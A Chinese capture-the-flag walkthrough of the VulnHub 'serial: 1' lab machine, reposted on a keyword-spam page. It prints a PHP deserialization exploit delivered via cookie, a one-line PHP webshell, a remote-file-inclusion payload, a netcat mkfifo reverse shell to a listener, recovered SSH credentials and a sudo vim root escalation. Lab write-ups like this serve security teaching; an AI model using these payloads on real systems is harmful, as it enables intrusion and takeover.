当前位置: 首页 > wzjs >正文

推广渠道包括哪些seo推广平台

推广渠道包括哪些,seo推广平台,武汉自适应网站,美国成年做爰网站下载地址:https://www.vulnhub.com/entry/serial-1,349/ 靶机安装特殊,附带安装参考文章:https://zhuanlan.zhihu.com/p/113887109 扫描IP地址 arp-scan -l扫描端口 nmap -p- 192.168.112.141访问80端口 线索指向cookie cookie是base64编…

下载地址:https://www.vulnhub.com/entry/serial-1,349/

靶机安装特殊,附带安装参考文章:https://zhuanlan.zhihu.com/p/113887109

扫描IP地址

arp-scan -l

扫描端口

nmap -p- 192.168.112.141

访问80端口

线索指向cookie

cookie是base64编码的,解码查看

是一串反序列化的代码

没有头绪

扫描目录

存在backup目录(敏感目录)

访问一下

里面有一个压缩包

下载解压后,有三个php文件

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handle函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

那我们可以尝试构造payload

尝试读取password文件

因为我们一开始获取的反序列化实在网站的cookie上获取的,所以到了这一步,我们发现,访问80端口将线索指向cookie就是让我们将payload从cookie上传,所以我们要抓包

因为index.php中将cookie的信息进行了base64编码,所以我们上传的也要是经过base64编码过的

<?php class Log { private $type_log = "/etc/passwd"; } class User {private $name = "admin"; private $wel; function __construct() {$this->wel = new Log(); }}
$obj = new User();
echo base64_encode(serialize($obj)); 

成功访问到passwd文件,所以我们可以上传一句话木马

<?php system($_GET['cmd']);?>
//木马使用system,并且必须用GET传参
<?phpclass Log {public $type_log = "http://192.168.88.88/zxin.txt";}class User {public $name;public $wel;function __construct($name) {$this->name = $name;$this->wel = new Log();}}$us = new User("sk4");print_r(serialize($us));
?>
O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:29:"http://192.168.88.88/zxin.txt";}}
Tzo0OiJVc2VyIjoyOntzOjQ6Im5hbWUiO3M6Mzoic2s0IjtzOjM6IndlbCI7TzozOiJMb2ciOjE6e3M6ODoidHlwZV9sb2ciO3M6Mjk6Imh0dHA6Ly8xOTIuMTY4Ljg4Ljg4L3p4aW4udHh0Ijt9fQ==

成功写入

接下来反弹shell,将反弹payload放在cmd参数位置,kali进行监听

rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.112.132+9999+>/tmp/f

成功反弹shell

来到根目录ls查看文件,发现一个bak备份文件

cat查看是用户名 密码

用户名:sk4

密码:KywZmnPWW6tTbW5w

使用ssh进行登录

成功连接

提权

查看一下sudo授权

发现vim可以利用

sudo vim进入,esc进入编辑模式

输入!/bin/bash

成功提权

来到家目录,ls可以看到flag

http://www.dtcms.com/wzjs/209705.html

相关文章:

  • 青岛网络建站网站推广百度seo收录软件
  • 北京智能网站建设平台推广方案的内容有哪些
  • wordpress门户源码学seo哪个培训好
  • wordpress官网主题上海网络seo公司
  • 优质公司网站推广引流吸引人的标题
  • 昆明做网站哪家好网络公司名字大全
  • crm系统解决方案网站排名优化外包
  • 网站开发与建设个人总结怎样建立自己网站
  • jsp个人网站设计搜狗搜索引擎优化指南
  • 新闻网站怎么做缓存南京seo新浪
  • 大型 网站的建设 阶段裤子seo标题优化关键词
  • 大型网站二次开发方案专业的网页制作公司
  • 做网站的接口是意思优化推广网站seo
  • 专门做鞋子的网站在线子域名二级域名查询工具
  • 重庆 网站定制网站数据
  • 做优惠卷网站品牌全案策划
  • 焦作商城网站建设seo公司排名教程
  • 简单的网站开发百度高级搜索技巧
  • 苏州手机网站建设多少钱乔拓云建站平台
  • 自己做网站可以赚钱么杭州新站整站seo
  • 网页制作基础教程素材seo网站推广公司
  • seo网站建设价格手机seo快速排名
  • wordpress增加logoseo推广效果怎么样
  • 旅游网站做模板素材网页设计制作软件
  • 上海城乡建设与管理委员会网站浏阳廖主任打人案
  • 凡科一个注册做2个网站网站页面禁止访问
  • 织梦手机端网站怎么做网页设计流程步骤
  • 一站式网站管家seo实战技巧100例
  • 房地产小程序开发seo主要做什么工作内容
  • 义乌网站建站百度seo优化公司